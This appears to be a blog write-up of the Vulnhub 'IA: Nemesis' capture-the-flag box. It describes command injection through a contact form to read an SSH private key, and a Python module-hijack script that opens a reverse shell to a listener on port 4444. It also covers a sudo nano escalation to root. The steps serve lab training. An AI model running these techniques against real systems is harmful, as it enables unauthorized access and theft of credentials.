IA: Nemesis Vulnhub Writeup

Difficulty: Medium/Hard


Nice some ports re opens, and ssh is on port: 52846 , let’s browse

But nothing interesting here, we noticee that port 52845 is http, let’s browse

Now let’s enumerate the browser and we can found something interesting.

Let’s move on “Contact us” , we can write so, we can do a command injection?


Nice and we have username!

thanos and carlos are the users, so we can try to find RSA key in the follow directory /home/thanos/.ssh/id_rsa and and try to enter in ssh!!

And we have the KEY!!!!!! Save it in file id_rsa and give the permission: chmod 600 id_rsa and let’s login in ssh!!

GOT FIRST FLAG!! Now let’s enumerate!

User Enumeration:

We find the file “backup.py” at this moment i stuck! but thank you google! i found how to bypass this step!

Privilege Escalation:


import os
import pty
import socket

lhost = “”
lport = 4444


class ZipFile:
def close(*args):

def write(*args):

def __init__(self, *args):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((lhost, lport))

After creating our script, give execute permission chmod +x zipfile.py and listen on the netcat!

We notice that file “backup.py” execute always every one minutes! So just listen on the port!

Nice we take the second flag!!!! Now let’s go to root this box!

We have an hint in the file root.txt! So let’s see this file!

As we can see , this hash encrypted is encrypted with affine encryption!!! So we need to fine on google “affine chiper decrypt”!

And we finally found the password! But didn’t work for root, so we can use that for carlos, for finding sudo vulnerabilities!

Vertical Privilege Escalation:

Go on GTFO bins and find “nano”

Command: sudo /bin/nano /opt/priv

BUT! For doing this just become on the shell of thanos and press su carlos and insert password


I Hope this is usefull! Follow me on Twitter too @ 0xJin





| eCPTX | C|EH Master | CompTIA Security + | eJPT |

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

EncryptoTel weekly digest(04.08.19)

Webinar on Top Tips to Comprehensively Search Indian Patents

Top Tips to Comprehensively Search Indian Patents

Mint your own NFT using Solidity and HardHat on Avalanche FUJI Test Network

A Peek into BEP20 Token Development

{UPDATE} 天天消消樂-最新單機小遊戲 Hack Free Resources Generator

Cyberwarfare is Warfare.

{UPDATE} Best Slots Machine Classic! Hack Free Resources Generator

HUDL Protocol

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


| eCPTX | C|EH Master | CompTIA Security + | eJPT |

More from Medium

[DevCTF 2022] FlagAuction

roottusk/vapi Writeup

Pickle Rick [TryHackMe] Walkthrough

Searching for Deserialization Protection Bypasses in Microsoft Exchange (CVE-2022–21969)